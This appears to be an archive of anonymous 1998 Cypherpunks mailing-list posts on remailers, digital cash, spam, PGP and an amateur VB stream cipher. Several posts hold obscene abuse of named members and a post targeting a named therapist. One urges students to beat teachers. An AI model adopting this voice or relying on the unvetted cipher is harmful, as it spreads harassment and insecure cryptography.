a Cypherpunk today. If the Cypherpunks (in the democratic sense)
actually support this, it is a sad day indeed.
As far as I'm concerned, go ahead and spam. You'll probably make FIJA
look like idiots, get some anonymous remailer sites shut down if you
spam through them, screw over any site even remotely mentioned in the
spam, get us blasted all over the abuse forums because it has been
discussed here recently, and accomplish the exact opposite of our goals. But go ahead if that's what makes you feel better.

@_date: 1998-12-27 13:00:50
@_author: Anonymous 
@_subject: Zero-Knowledge Freedom AnonymousIP Whitepaper 
Have algorithms been chosen? If I understand right, letting different users use
different algos would make some users' messages look different from others
while bouncing around in the network. I don't think anyone even suspects
3DES and a KEA cognate would fail.
The "topologically close" tradeoff (i.e, a gain in performance for an
unmeasured loss in security) seems to be more exploit-bait than optimization;
it might be wiser not to enable this part of automatic route selection by
default unless/until its effects on security are investigated more thoroughly.
At least give me a while to make an attack on it. :)

@_date: 1998-12-28 02:55:22
@_author: Anonymous 
@_subject: Mixmaster client 4 the Mac OS? 
What the fuck is this guy talking about?  PGPsdk libraries for
I must admit, I was surprised not to see a (l)user at aol.com in
this.  Go and play on the fuckwit PGP list and give us a break
over here.

@_date: 1998-12-28 10:15:04
@_author: Anonymous 
@_subject: Mail2news@anon.lcs.mit.edu Not Propagating to Compuserve/Sprynet 
Has anyone else experienced posts sent via the anon.lcs.mit.edu
mail2news gateway not propagating to Compuserve/Sprynet's news
servers?  I've made a couple of posts, both anonymously and
non-anonymously via that gateway, and they haven't been showing up
at CIS/Sprynet.  Yet they've been archived on Dejanews and replies
to them from users on other servers have shown up.
Is this a propagation problem, or are Compuserve and Sprynet
blocking posts from that gateway?

@_date: 1998-12-29 00:48:53
@_author: Anonymous 
@_subject: Mail2news@anon.lcs.mit.edu Not Propagating to Compuserve/Sprynet 
Hey! Stop abusing the anonymous remailers! Your identity isn't findable! It
defeats the whole purpose of Anon!

@_date: 1998-12-29 10:01:44
@_author: Anonymous 
@_subject: kha0S Linux 
kha0S Linux is a new distribution currently in
development. The primary goal of this project is to
integrate and embed strong cryptography within a robust
Linux distribution. kha0S is currently seeking the
assistance of developers with strong backgrounds in
cryptography and source code security auditing. Please
visit the homepage for additional information.

@_date: 1998-12-29 11:12:40
@_author: Anonymous 
@_subject: Anna Holmes, MarBLes, and the Married Lesbian Underground 
In article <368690ea.96913979 at news.mindspring.com>,
I visited Anna Holmes'  (the moderator of the
Married but Lesbian [MarBLes] mailing list) website at
 and discovered that she's a
licensed shrink who lives in Birmingham, AL.  Thus, there may be
some "deep pockets" in the form of her malpractice insurance, as
well as the hosts of the mailing list itself, queernet.org.
I'm not sure what sort of other action is possible, but I'm sure if
Holmes were "supporting" the defrauding of African Americans rather
than married men, Jesse Jackson would figure out a way to bring some
pressure to bear against her and those aiding and abetting her
clandestine activities.

@_date: 1998-12-30 18:11:12
@_author: Anonymous 
@_subject: distribution scheme 
forget my earlier mail saying I had uploaded to funet.fi - seems
I get "permission denied" from both there and csua.berkeley.edu
even in the incoming dirs.
am I missing something here? please tell me where I can upload.

@_date: 1998-12-30 21:48:03
@_author: Anonymous 
@_subject: distribution scheme 
I'm sorry, but it seems I have missed the original mail, i.e. the first quote here.
if there is anything important in it that was not quoted, please include it
somewhere in your replies. I hope I haven't missed any other mail.
yes, I found that out in the meantime. the legal aspect falls short
of my expectations. I still consider the scheme to be both simple and
useful because it actually changes the byte structure, so looking
for 'a' or 'e' or similiar pattern-analysis does not work anymore. in
combination with steganography, I believe this can make things really
hard to find, but I'm willing to learn the opposite if someone with
more cryptoanalysis know-how tells me. if I'm right, it might still
be useful for people, e.g. in china working outside their local laws
it probably needs extension before it's really useful, so I have put
up the code on funet.fi (pub/crypto/cypherpunks/incoming). take a
look and tell me what you think, please.

@_date: 1998-02-01 20:25:51
@_author: Anonymous 
@_subject: Zero-knowledge commit 
Timmy C[unt] May carries a turd in his wallet for identification purposes.
                  __|     \ /     |__
      _ o   ___\o    \o    |    o/    o/___  o _  Timmy C[unt] May
       /\  /)  |     ( \  /o\  / )     |  (\  /\
   ___|_\______                          _____/_|__

@_date: 1998-02-01 21:44:53
@_author: Anonymous 
@_subject: 2001 Tiger Tots 
London Sunday Times
February 1, 1998
Arthur C Clarke sex scandal hits Charles's Sri Lanka visit
by Yvonne Ridley
 THE Prince of Wales's visit to Sri Lanka
 this week hit a new problem last night
 after Arthur C Clarke, the respected
 science fiction writer due to be knighted
 by Charles, allegedly confessed to being a
 paedophile.
 The investiture is due to take place on
 Wednesday during the prince's visit, which
 coincides with the celebrations for the
 50th anniversary of the island's
 independence.
 Downing Street said last night: "As far as
 we are concerned the investiture is still
 going ahead as planned." A spokesman
 refused to comment on the possibility of a
 forfeiture of the honour by the 80-year-old
 author of 2001: A Space Odyssey.
 Clarke's revelations, published in today's
 Sunday Mirror, are bound to embarrass
 Tony Blair, who named him in his first
 new year honours as prime minister.
 Last night diplomats in Colombo, the
 island's capital, were being asked to assess
 the author's tabloid confession. If the
 report is taken at face value the ceremony
 is unlikely to go ahead.
 Buckingham Palace advisers contacted
 British embassy officials in Sri Lanka this
 year to make discreet inquiries after
 rumours about Clarke's sexuality and
 private life.
 They reported that, although Clarke was
 known to be gay, there was no evidence of
 paedophilia.
 The British-born author of more than 80
 novels, who has adopted Sri Lanka as his
 home, was unable to travel to Britain to
 receive his knighthood from the Queen
 because he is virtually confined to a
 wheelchair as a result of post-polio
 syndrome.
 In 1989 he was made a CBE for his
 services to British cultural interests in Sri
 Lanka, where he enjoys a tax-free lifestyle
 bestowed on him by the island because of
 his celebrity status.
 He previously met Charles at the British
 premiere of his Odyssey film in the 1960s,
 for which he received an Oscar
 nomination.
 Surrey-born Clarke was married briefly in
 1953 to Marilyn Mayfield, an American
 who has since died. The marriage lasted
 about six months after a whirlwind affair.
 After the split Clarke moved to Sri Lanka,
 where he now lives in a luxurious home
 surrounded by state-of-the-art technology
 and computers that allow him to keep in
 touch with friends around the world.
 His study is lined with photographs of
 celebrities and admirers of his work,
 including the Pope, Diana, Princess of
 Wales, Elizabeth Taylor and the astronaut
 Neil Armstrong.
 The news also threatens to cast a shadow
 during the royal visit for senior officials
 on the island as they have always been
 proud of the eminent author's presence
 during the past 40 years. Homosexuality is
 regarded as an offence in Sri Lanka and
 carries a prison sentence of up to 10 years.
 Charles's planned trip was already marred
 last week by a terrorist attack on a temple
 that was to have been the scene of the
 independence celebrations.
 The bomb killed 17 people, including a
 suicide team who drove a truck into the
 old hill capital of Kandy.
 Buddhist leaders have called for a boycott
 of this week's ceremonies in protest at
 Charles's presence. They say Britain
 sympathises with the island's separatist
 Tamil Tiger rebels. They also claim the
 Tamil Tigers, who carried out the
 bombing, have been allowed to raise
 money in London for terrorist campaigns.
 Since the bombing some Buddhist leaders
 have intensified demands for a formal
 apology from Britain for its colonial rule.
 A Foreign Office spokesman said last
 night that he fully expected Charles's visit
 to Sri Lanka to go ahead despite the
 security fears over recent terrorist
 activities.
 A report that members of the prince's royal
 protection squad would not be allowed to
 carry guns was an "administrative point"
 that would be resolved before the party
 left, he said.
 "It is an island where there is a history of
 terrorist problems with the Tamil Tigers
 and, from time to time, with explosions
 and so forth, so not unnaturally we are
 looking very closely at security," the
 spokesman said.

@_date: 1998-02-03 09:42:41
@_author: Anonymous 
@_subject: The Continued Attack on Cash (Was: "The Right of Anonymity"...) 
Ironically, the reglations may be their own undoing here.  It seems most
banks have decided to recoup the expense of all that paperwork by charging
per-transaction ATM fees.  And customers hate transaction fees, so they
tend to take out as much money as possible each time they use the ATM.

@_date: 1998-02-03 10:54:41
@_author: Anonymous 
@_subject: The Continued Attack on Cash (Was: "The Right of Anonymity"...) 
Easier said than done.
Designing digital cash software is easy.  (Several prototypes exist.)
Getting people to accept it as having value is not.
But let's suppose that we build a complete fault-tolerant digital cash
system with multiply-redunant servers all over the world, and you can sit
at your computer and trade crypto-credits with whoever you want.
You've got a small fortune worth of e$.  What are you going to buy with it?
Are you going to buy groceries at the local supermarket with cypherbucks?
I doubt it.  Surely you can't use the system to pay for your house or car,
or other government-traceable assets.  And certainly not airline tickets.
Perhaps you could buy a new computer.  That would work, if you could
arrange delivery anonymously (which I doubt).  Or maybe you could pick it
up in person, but you don't need e-cash for that.
About the only practical thing you could buy would be a pre-paid phone
card.  Anything else, you'd need to arrange delivery for, and if you can
have contraband mailed to you, then you can have other things that you
don't want sent to you.
The problem is not digital cash.  The problem is delivering the goods
bought with it.  Solve the delivery problem and digital cash will follow.

@_date: 1998-02-03 12:12:43
@_author: Anonymous 
@_subject: Airline ticket information -- help 
I assume Tim is joking here, but this info really isn't too hard to find.
Just as an example, call USAir at 1-800-428-4322, press 1 for automated
service.  It will give you options to check scheduled flights and
departure times.  After you find the flight number, select the option to
confirm your reservation or select a seat.  It will ask for your frequent
flyer account number, but if you don't enter one, the helpful computer
will let you enter the passenger's last name instead.
Several other airlines have similar services..  Happy hunting!

@_date: 1998-02-03 12:17:27
@_author: Anonymous 
@_subject: Bork 
Once-a, zeere-a ves thees keed vhu, tuuk, a treep tu seengepure-a, und bruooght elung hees sprey peeent.... Und vhee.... he-a feenelly ceme-a beck. He-a, hed... cune-a merks ell oofer hees buttum.... he-a seeed thet is ves frum vhere-a zee verdee vhecked it su... herd.....
Bork Bork Bork!

@_date: 1998-02-03 14:36:29
@_author: Anonymous 
@_subject: Exon oxen gored 
Exon and his ilk have loose bowels and bladder control problems. They shit all over the populace and urinate all over the Constitution.

@_date: 1998-02-03 16:19:02
@_author: Anonymous 
@_subject: Inquiry 
Dimitri "Buttfuck" Vulis' reheated, refurbished, and regurgitated cud is completely inappropriate for the mailing lists into which it is cross-ruminated.
      ,,,
 -ooO(o o)Ooo- Dimitri "Buttfuck" Vulis
      (_)

@_date: 1998-02-04 04:35:08
@_author: Anonymous 
@_subject: A fatal flaw in PGP 6.0 
This was posted anonymously to alt.security.pgp last night
encrypt e-mail I get an error:
cypher as ROT-13 though!  I changed mine to RC-2 255-bit.
Anyone like to confirm this?

@_date: 1998-02-05 12:17:41
@_author: Anonymous 
@_subject: Changing to Moderated Cypherpunks -- How? 
Wow! Thanks for that tip! The cypherwatch list looks great.  I suggest you all
subscribe now!! :-)

@_date: 1998-02-07 10:03:21
@_author: Anonymous 
@_subject: Lets check this out 
All I see there is a few midi files and some badly-written HTML.
Nothing there to hack into my C:/ drive.  I don't even have a C: drive.
If you were running a more secure operating system, you wouldn't either.
You obviously haven't been reading this list very long.  There are lots
of way to do nasty things to microslob windoze, including: Buffer overruns
in IE, javascript bugs in web browsers, launching applications thru
mime-types, SMB bugs (oob-attack, cd ..\, and others), macro (and other)
viruses, buffer overruns in the tcp stack (oversized pings, etc), as well
as the near infinite number of possible active-x exploits.

@_date: 1998-02-07 14:46:42
@_author: Anonymous 
@_subject: BBN 
Timothy C[unt] May is the living proof that anal sex causes pregnancy.
       ____
       \ _/__ Timothy C[unt] May
        \\  /
          \/

@_date: 1998-02-08 06:16:29
@_author: Anonymous 
@_subject: Monthly memory giveaway - now win up to 64 Megabytes of Memory! 
Thank you for contacting us to request a security audit of your web site.
Based on the information you provided, we have determined that you were
running an insecure operating system (Microsoft Windows NT) as evidenced
by the blue screen currently visible on your computer monitor.  Should you
wish further investigation of your site vulnerabilities, please continue
to send us annoying spam requests.

@_date: 1998-02-09 04:46:23
@_author: Anonymous 
@_subject: Driver Licenses 
Odd.  When I first got a card with the stripe, I was a little paranoid so
I took a bar magnet and erased it.  Actually, I don't know whether my
eraser worked because nobody has ever asked to swipe my card thru a
reader.  I got a wallet with a plastic fold-out so if someone asks to see
my id, I open my wallet and show it to them, then put it away.

@_date: 1998-02-09 05:08:09
@_author: Anonymous 
@_subject: Software Reverse Engineering 
Hi All -
I've recently been disassembling some software written by idiots who never
heard of operating systems other than messy-windows, so that I can
re-implement it on my favorite platform (and fix numerous bugs).
I know many of you have done work in this area so maybe you can give me a
few tips.
I ran the program and traced its execution, which quickly showed what parts
were significant, and it's pretty easy to figure out what the relevant
functions are and what they do.  I was able to recompile sections of the
code into my own program and make it work without too much difficulty.
What is bugging me is this:  The program contains huge amounts of 'junk code' such as the following (disassembled with gdb):
     movl   0x7c58c,%eax
     movl   %eax,0xffffffa8(%ebp)
     movl   0xffffffa8(%ebp),%eax
     movl   %eax,0x7c590
     movl   0x7c590,%eax
     movl   %eax,0xffffffa8(%ebp)
     movl   0xffffffa8(%ebp),%edx
This segment of code accomplishes nothing execpt to move the same value
around into different locations, which are never again read.  At least
half of the instructions consist of similiar garbage, writing data into
locations that are never read, duplicating constants, copying values that
are never used, and so on.  The only thing saving the program from
running out of memory is that the programmer mostly used static buffers,
only sparingly doing dynamic allocation.  I'm quite surprised that I
haven't found any buffer overruns or security holes yet.
So, does anyone have reccomendations of what is the best way to seperate
the wheat from the chaff, so to speak?  I can use the program as is, but
the sheer amount of junk tends to make it run slowly, so I'd much prefer
to completely rewrite it.

@_date: 1998-02-09 11:29:20
@_author: Anonymous 
@_subject: Driver Licenses (fwd) 
"Yeah, officer, I dropped my ID in the street and it got run over.  Don't
give me such a hard time about it, I'm just glad I got it back..."
I really doubt you are going to get convicted for accidently dropping your
wallet because your ID got scraped up a little bit on the back side.
Seriously, the best way is a strong magnet.  You can also put it in your
shirt pocket and iron it, then apply a strong magnet.  The heat will make
it lose its magnetism more quickly; just make shure you don't melt it. :)

@_date: 1998-02-09 15:56:46
@_author: Anonymous 
@_subject: Drivers Licenses 
"Yes SIR!"
"Yes SIR!"
"Yes SIR!"
"Yes SIR!"
"No, SIR!"
"Yes SIR!"
"No SIR!"
This is one of the things I love so about Texas and Texans.
Despite inexplicable rumors and propaganda about independence
and rugged frontier indivuality, Texans are as fucking
obedient to authority as the most lock-stepped fucking
Germans. The People's Republic of Texas is on the leading edge of Big Brother statism. Sales tax fully as high as
New York's, fingerprints at driver license renewal time,
roadblocks to fish for people who have been indulging in
adult beverages or who have outstanding warrants, and some
of the most dumb-fuck, clueless, fuckwit people behind
badges in the known universe. Texans will give anyone
their SS number at any time for any reason. Many print it
on their checks. Texas is without doubt the Rube State.
The only reason it isn't on the bleeding foreskin of
Big Brother technology is that there aren't enough clues
in the state to rub together to make a spark. When you
run into anyone halfway sharp or better in Texas, it's
a cinch they are a refugee from the unforgiving North.

@_date: 1998-02-10 02:14:34
@_author: Anonymous 
@_subject: rec.guns et.al. blocked by censorware 
These companies are attempting to provide the services desired by
their customers.  These are generally cautious, conservative parents
who want to allow their young children access to the internet without
them stumbling over dangerous or disturbing information.  Like it or not,
many parents are very protective of their children.  We have no right
to force our own views of childrearing on them.
The filtering companies are filling a legitimate need in the marketplace.
They are not evil and they are not trying to prevent adults from viewing
the material they desire via their own personal accounts.  They give
concerned parents a sense of safety in allowing their children to use
the internet, and in that way allow young people access to the net who
would not otherwise be allowed to use it.

@_date: 1998-02-10 07:21:52
@_author: Anonymous 
@_subject: E-CDA 
Congressional Record: February 5, 1998 (House)
                   ELECTRONIC CAMPAIGN DISCLOSURE ACT
  (Mr. WHITE asked and was given permission to address the House for 1   Mr. WHITE. Madam Speaker, in March we are going to vote on campaign finance reform in this House. It is a very important issue but also a very difficult issue, and it is made particularly difficult because most of the bills before us are big bills that deal with the whole comprehensive issue that we have to talk about.
  I have got one of those bills, and I hope that we can pass one. But just in case we cannot, today I am introducing what we might call a small bill that will deal at least with some of the problems. This bill is called the Electronic Campaign Disclosure Act, and what it does is tell the Federal Elections Commission to get into the 21st century.
  It directs the FEC to establish a database on-line to search over the Internet for all the information needed about campaign finances in our country. Every campaign would have to file within 10 days a report of every contribution that it receives and contributors, and PACs would also have to file.
  Madam Speaker, sometimes we cannot do it all in one step. The longest journey begins with a single step, and I think if we cannot pass a big bill a small bill like the one I am introducing today would be a step in the right direction.
                          ____________________

@_date: 1998-02-10 09:57:52
@_author: Anonymous 
@_subject: Driver Licenses 
Actually, thanks to NAFTA, the Mexicans can drive without citizenship
papers, and they don't have to give the California DMV shit.  All they
need is a valid mexican driver license and they can drive in the US.

@_date: 1998-02-10 10:18:37
@_author: Anonymous 
@_subject: What Jim Choate doesn't know 
When Jim Choate writes about something that I know about, he is usually
wrong.  Look at the hash he made of quantum mechanics recently.  And don't
get me started on his blunders regarding cryptography.
So when he writes about something I don't know about, like the EM
emissions of video tubes, I tend to assume the same thing.  He's probably
all messed up.
Anybody else have the same experience?
And how about his countless off-topic posts, forwarding all kinds of
pointless crap?  Is anyone else sick of that, too?

@_date: 1998-02-10 13:54:08
@_author: Anonymous 
@_subject: King Willie:-- He's between Iraq and a Hard-On 
Well... It looks as though the 17th will be a "good day to die"
if your an Iraqi...Many sources seem to be targeting the window
of Feb 17 - Feb 23 for the start of hostilities...
Wag the dawg... comes to mind of course... I wouldn't put it past
King Willie to do such a thing to deflect attention from Peckergate..
It seems to me though that the lunatic in charge of North Korea
might just find that Feb 17- 23 is also a good time to play
games in the south :(  after all... the worlds policeman will be
preoccupied and stretched mighty thin...

@_date: 1998-02-10 23:23:34
@_author: Anonymous 
@_subject: Driver Licenses 
D'jinnie asked:
Amendment I.  Congress shall make no law respecting an establishment of
religion, or prohibiting the free exercise thereof; or abridging the
freedom of speech, or of the press; or the right of the people peaceably
to assemble, and to petition the government for a redress of grievances.

@_date: 1998-02-11 09:37:20
@_author: Anonymous 
@_subject: Godwin, et al, a pity, this 
Who are the "digerati" and why are they "the
cyber elite"? They are the doers, thinkers, and
writers who have tremendous influence on the
emerging communication revolution. They are
not on the frontier, they are the frontier.
The digerati evangelize, connect people, adapt quickly.
They like to talk with their peers because it forces them
to go to the top of their form and explain their most
interesting new ideas. They give each other permission
to be great. That's who they want to talk to about the
things they are excited about because they want to see if
it plays. They ask each other the questions they are
asking themselves, and that's part of what makes this
cyber elite work.
                           The Connector                                < John Brockman>
                           The Pragmatist                                < Stewart Alsop >
                           The Coyote                                < John Perry Barlow >
                           The Scout                                < Stewart Brand >
                           The Seer                                < David Bunnell >
                           The Thinker                                < Doug Carlston >
                           The Idealist                                < Denise Caruso >
                           The Statesman                                < Steve Case >
                           The Physicist                                < Greg Clark >
                           The Matchmaker                                < John Doerr >
                           The Gadfly                                < John C. Dvorak >
                           The Pattern-Recognizer                                < Esther Dyson >
                           The Software Developer                                < Bill Gates >
                           The Conservative                                < David Gelernter >
                           The Defender                                < Mike Godwin >
                           The Genius                                < W. Daniel Hillis >
                           The Judge                                < David R. Johnson >
                           The Searcher                                < Brewster Kahle >
                           The Saint                                < Kevin Kelly >
                           The Prodigy                                < Jaron Lanier >
                                                The Marketer                                                     < Ted Leonsis >
                                                The Scribe                                                     < John Markoff >
                                                The Maestro                                                     < Stewart McBride>
                                                The Force                                                     < John McCrea >
                                                The Competitor                                                     < Scott McNealy >
                                                The Publisher                                                     < Jane Metcalfe >
                                                The Pilgrim                                                     < Jerry Michalski >
                                                The Chef                                                     < Nathan Myhrvold>
                                                The Webmaster                                                     < Kip Parent >
                                                The Citizen                                                     < Howard Rheingold >
                                                The Buccaneer                                                     < Louis Rossetto >
                                                The Curator                                                     < Doug Rowan >
                                                The Oracle                                                     < Paul Saffo >
                                                The Radical                                                     < Bob Stein >
                                                The Skeptic                                                     < Cliff Stoll >
                                                The Catalyst                                                     < Linda Stone >
                                                The Evangelist                                                     < Lew Tucker >
                                                The Cyberanalyst                                                     < Sherry Turkle >
                                                The Lover                                                     < Dave Winer >
                                                The Impresario                                                     < Richard Saul Wurman >

@_date: 1998-02-11 15:38:15
@_author: Anonymous 
@_subject: PGP 5.5 BS upgrade 
Has anyone got the upgrade/bugfix for PGP 5.5 Business Security?  I think it's
5.5.2 (?)  I'm looking for the Win platform upgrade if anyone can help. Perhaps someone could upload it to a c'punk FTP site or post the URL.
Thanks in advance!

@_date: 1998-02-14 23:50:40
@_author: Anonymous 
@_subject: crackers 
I like them with some cheese, but you may not.  You'll have to let us know if
you like cheese or not.  BTW those crackers you can get from Wal-Mart are
better than password crackers IMHO
Free lunch anyone? ;-)

@_date: 1998-02-15 09:42:23
@_author: Anonymous 
@_subject: Hlep 
A cloud of linear purity began to move over the sand-monster, billowing with precipitory anticipation.
Small blood puzzles aligned themselves like melanomas, forming patterns of infinite finality.
The puzzle-monsters coalesced as lasers, carving
lesions from flesh and riddling the brittle skin
with xray cracks.
Soon it would be as it before, finally.
- A'Tak A'Tdorn

@_date: 1998-02-15 22:19:55
@_author: Anonymous 
@_subject: high speed management method 
Please teach high speed management method
of block cypher to me.

@_date: 1998-02-16 17:52:22
@_author: Anonymous 
@_subject: We've been found out 
Damn! I thought we had everyone fooled.
Death of a Legend / The Truth About the CypherPunks:
The CypherPunks have long been renowned as standing at the bleeding edge the burdgeoning computer technology which is rapidly changing the face of our
planet and the governmental, civil, and social societies encompassed this celestial orb.
Harbingers of the Digital Future / Pioneers of Future Technology / etc., The CypherPunks are rag-tag band of infantile, pseudo-anarchistic, cryptic, well-educated shit-disturbers who take great pleasure in pissing on
themselves, each other, and the world around them--all the while, their motivations and ambitions with high-sounding ideals intended to the fact that none of them ever received proper toilet-training.
The end result?
No matter how high they pile it, how far they spread it, or how badly it smells when you step in it, they end up coming off as the Henry of CyberSpace, because no matter how much rotten meat, jalapenos and cheese they eat, they can never manage to crap out anything so vile and smelling that the world-at-large cannot prove prophetic in MeatSpace.

@_date: 1998-02-16 18:28:58
@_author: Anonymous 
@_subject: (none) 
Anonymous asks:
Because it's so easy to kill yourself doing so.

@_date: 1998-02-17 19:04:31
@_author: Anonymous 
@_subject: description of my stream cipher 
Newsgroups:   sci.crypt
[Subscribe to sci.crypt] [More Headers]
Here is description of my stream cipher, it operates one
byte at time, instead of one bit at time.
its key length is up to 255 bytes (2040 bits)
im sure that there are no need for longer description,
becourse that vb source code explanes details.
only thing that could be difficult to understund is
Asc(Mid(Text2, R2 - 1, 1)) that simppely means that
take asci value from text (in this case string text2)
starting from R2 - 1 and length of 1. i think that
everyone understunds the rest.
VB source code:
Initializing the substitution-box
On Error Resume Next
D = Len(Key)
R = 1
For R2 = 1 To 256
H1 = Asc(Mid(Text2, R2 - 1, 1))
K1 = Asc(Mid(Text2, R, 1))
K2 = Asc(Mid(Text2, D Mod Len(Text2), 1))
K3 = Asc(Mid(Text2, D * R Mod Len(Text2), 1))
K4 = Asc(Mid(Text2, R + D Mod Len(Text2), 1))
R1 = ((R1 + R2 + K + 1) Xor (R1 * R2 + 1)) Mod 256
R3 = ((R3 + R1 + 1) + R2 + (R1 * K + 1 Mod (R3 + R1 + 1))) Mod 256
R4 = (R4 + R3 + R1 + 1) ^ 2 Mod 256
R = R + 1
If (R - 1) = Len(Text2) Then R = 1
C = (C + (H1 + K1 + K2 + K3 + K4 + D + R1 + R3 + R4) Mod 256) Mod 256
C = C Mod 256
SBox = SBox & Chr(C Mod 255 + 1)
On Error Resume Next
Key = Text2
texti = Text1
Text1 = ""
R = 1
S1 = Len(Key)
S2 = 11
For R2 = 1 To Len(texti)
C = Asc(Mid(texti, R2, 1)) - 1
K = (K + Asc(Mid(Key, R2 Mod Len(Key), 1))) Mod 256
K = (K + Asc(Mid(SBox, (((K * R2 Mod 256) - 255) * -1) Mod 257, 1))) Mod
R1 = ((R1 + R2 + K) Xor (R1 * R2)) Mod 256
R3 = ((R3 + R1) + R2 + (R1 * K Mod (R3 + R1))) Mod 256
R4 = (R4 + R3 + R1) ^ 2 Mod 256
F1 = (F1 + (Asc(Mid(SBox, R1 Mod 256, 1)) Mod 256) Mod 256)
F2 = (F2 + (Asc(Mid(SBox, R2 Mod 256, 1)) Mod 256) Mod 256)
F3 = (F3 + (Asc(Mid(SBox, R3 Mod 256, 1)) Mod 256) Mod 256)
F4 = (F4 + (Asc(Mid(SBox, R4 Mod 256, 1)) Mod 256) Mod 256)
F5 = (F5 + (Asc(Mid(SBox, K Mod 256, 1)) Mod 256) Mod 256)
temp = F1 + F2 + F3 + F4 + F5 + M Mod 256
F = (F + (Asc(Mid(SBox, temp, 1)) Mod 256) Mod 256)
M = M + 1
If M = 2 Then M = 0
If M = 0 Then C = C Xor ((F + K) Mod 256)
If M = 1 Then C = C Xor ((((F + K) Mod 256) - 255) * -1)
C = (C Mod 256) + 1
Mid(texti, R2, 1) = Chr(C)
Text1 = texti

@_date: 1998-02-19 01:49:25
@_author: Anonymous 
@_subject: Is spam really a problem? 
I see discussion of spam here and everywhere on
the net. But who finds it a *real* problem, and
I've been on the net for nearly 20 years. I'm
active on numerous mailing lists. I post to usenet. I have a website. In all cases (except this post) I use real email Nevertheless, spam does not create a big problem
for me. Perhaps 10-15% of my home email is spam,
(much less at work) and I identify and kill it in less time than it takes me to sort out the junk from my snail mail.
Don't get me wrong; I don't *like* spam. But for me it's a minor problem, certainly not
worthy of legal remedies. I'm willing to suffer
a certain level of foolish annoyance gladly in return for liberty.
The only point at which spam is more than a minor irritation is when sexual spam turns up in
my home mail or in inappropriate news groups, and then only because I have young kids, who
I don't wish to be exposed to porn until they
are more mature (if you flame me on this, you're
missing the point of this post, and will be
PS: I'm slightly anonymous in this message
because I fear that if I used my real name,
some jerk would decide to sign me up for
every spam source on the planet, to prove
a point.

@_date: 1998-02-19 04:15:48
@_author: Anonymous 
@_subject: No Subject 
I used to have the same attitude. But then I started running a mail
Routinely I find spammers attempting to use my server as a relay for
their crap. The undeliverable notifications fill up my postmaster mail
box so that I have to spend much more than "a few seconds" to sort out
this virtual mail bomb from the legitimate notifications I need to do
something about.
Current I am chasing some asshole from ISP to ISP in Arizona, shutting
him down only to have him get a new account with another ISP and "mail
bomb" me from there.
I would gladly prosecute, as this person is no better than a thief,
stealing my resources and time so he can run his con.
BTW, the reason I sent anon is so other spammers don't get my host name
and try to use it as a relay.

@_date: 1998-02-19 08:11:15
@_author: Anonymous 
@_subject: New technology around the corner [slashdot.org] 
They work fine.  Just keep it in liquid nitrogen or you'll lose all your
Backyard fabs?  Quite doable with MBE or electron beam lithography.  Just
don't expect to do any mass-production on such a setup.
There's possible, and then there's practical.  You've ranted on that
subject a lot.  ("AMD can't make enough chips.")

@_date: 1998-02-19 08:25:32
@_author: Anonymous 
@_subject: New technology around the corner [slashdot.org] 
They work fine.  Just keep it in liquid nitrogen or you'll lose all your
Backyard fabs?  Quite doable with MBE or electron beam lithography.  Just
don't expect to do any mass-production on such a setup.
There's possible, and then there's practical.  You've ranted on that
subject a lot.  ("AMD can't make enough chips.")

@_date: 1998-02-19 08:37:42
@_author: Anonymous 
@_subject: Is spam really a problem? 
Those of us outside of the Microsoft Marketing Machine have a different
opinion.  Frankly, I do not want to make Bill Gates's latest advertising
gimmick any more 'efficient' nor do I want to be his 'potential customer'.
I have had just about enough crap from Microsoft, which is why I deleted
JunkOS version 95, and use Linux instead.
When I open up my email and find twenty pieces of spam, like most people
I start hitting the delete key.  Last week I got a call from a friend...
"Didn't you get my email?"  "uh... no..."

@_date: 1998-02-20 06:20:43
@_author: Anonymous 
@_subject: Anthrax--The Horsemen are Riding 
Yet another wrong call by Tim "Chicken Little" May:
Nonsense.  This has nothing to do with Saddam.  These men are from the
Aryan Nation, a militia group (and one which Tim secretly supports, being
a strong believer in Aryan superiority).  No wonder he is upset, when
his favorite racists are shown to be just another bunch of terrorists,
willing to kill innocents to promote their hate-filled cause.
How incoherent can you get?  How on earth can terrorism by the militias
be related to the war in Iraq?  Jeez, what an idiot.
This would be funny if it weren't so sad.  And you guys really _respect_
someone who would write this nonsense?
It's a sad story when the one who is supposed to be the brains of the
group is this stupid.

@_date: 1998-02-20 11:45:11
@_author: Anonymous 
@_subject: Is spam really a problem? 
Tim wrote to Ray:
Spam is plainly not theft.  Littering or pollution is a better analogy.

@_date: 1998-02-20 13:50:54
@_author: Anonymous 
@_subject: PLO censoring pro-Iraqi sentiments 
There is honor in fighting for something you believe in, taking a risk with
the belief that your actions may make things better.  What were those
soldiers in Somalia fighting for?
Yes, we know those people died in Somalia.  What did they die for?
Oh, just following orders... where have I heard that before...

@_date: 1998-02-21 06:20:12
@_author: Anonymous 
@_subject: about AES 
What is the encryption method that thinks to become
Advanced Encryption Standard (AES)?

@_date: 1998-02-21 11:55:13
@_author: Anonymous 
@_subject: Last Chance ...less than 149 copies left! Plus FREE Bonus. 
You spammed to the Cypherpunks list:
Go fuck yourself, preferably up the ass with a large metal hook.

@_date: 1998-02-21 12:01:29
@_author: Anonymous 
@_subject: The Eloquence of Timothy C. May 
9 May 1997:
12 Nov 1997:
26 Sep 1997:
Sad, isn't it?

@_date: 1998-02-21 20:03:00
@_author: Anonymous 
@_subject: Some children are rabid and need to be put down 
Tim May is spot on about the feral kid. Yet, battering the clone bruises the produce and harms sales.
Kids are over-coddled species and that's the cause of the rise in black market of kiddie porn, kidnapping, rape, incest and murder, what with crazed adults (parents and wannabes) wanting to develop for home domination hyper-valued Benets, since they're worth more on the market as icons than as needy brats begging for affection and attention, and interfering with dad and mom getting on with maximum self-indulgence.
And there's way too many kids, anyhow, the market's saturated. Especially those over the age of adorable cuddling and grandma gaga for adverts. Harvest all over the age of two, say, when they become unruly, as the Brit pedophagist proposed for the Irish surplus to solve the famine. Shut the day cares, schools, colleges,
boot camps for homicidals. Unplug the Net for those under 30,
they're more socially useful as protein, as anciently preached
by St. Peter's Eunuchs.
Eat the kids, doom the race. Evolution stops with the me-gen.
The technical solution to the after-me-nada agribusiness is set out in Tim's aggra-sig:
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.

@_date: 1998-02-22 05:05:10
@_author: Anonymous 
@_subject: Pensacola Police have lost their mind!! (fwd) 
Exactly. As far as I'm concerned, if the "educators" act physically
theatening towards any student then the student is perfectly within his or
her rights to beat the living shit out of the "teacher." It's classic. The government has a monopoly on violence, even in schools. If
